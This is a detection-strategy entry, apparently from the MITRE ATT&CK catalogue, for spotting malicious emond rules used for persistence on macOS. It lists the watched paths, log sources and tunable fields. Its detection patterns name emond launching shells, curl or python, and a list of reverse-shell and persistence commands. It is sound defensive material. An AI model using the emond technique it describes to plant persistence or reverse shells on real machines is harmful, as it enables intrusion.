DET0555 Detection Strategy for Event Triggered Execution via emond on macOS

Item	Value
ID	DET0555
Version	1.0
Created	21 October 2025
Last Modified	21 October 2025

Technique Detected: T1546.014 (Emond)

Analytics

macOS

AN1534

Detection focuses on identifying unauthorized file creation or modification within /etc/emond.d/rules/ or /private/var/db/emondClients, which indicate attempts to register a malicious emond rule. Correlate with process execution of /sbin/emond and any launched commands it invokes, especially during boot or login events. Anomalies may include rules created by non-root users or unexpected shell commands executed by emond.

Log Sources

Data Component	Name	Channel
File Creation (DC0039)	macos:unifiedlog	file create or modify in /etc/emond.d/rules or /private/var/db/emondClients
Process Creation (DC0032)	macos:unifiedlog	execution of /sbin/emond with child processes launched
File Modification (DC0061)	macos:unifiedlog	rule definitions written to emond rule plists
Command Execution (DC0064)	macos:unifiedlog	command execution triggered by emond (e.g., shell, curl, python)

Mutable Elements

Field	Description
PathPrefix	Paths such as `/etc/emond.d/rules/` and `/private/var/db/emondClients` may vary slightly or be symlinked in some setups
TimeWindow	The time range for correlating rule file creation to emond execution may be tuned based on system performance and usage
ParentProcessFilter	Defenders may wish to restrict alerts to emond processes not spawned from trusted system update or provisioning tools
CommandPatternList	List of known suspicious commands or binaries used by adversaries (e.g., reverse shells, persistence scripts)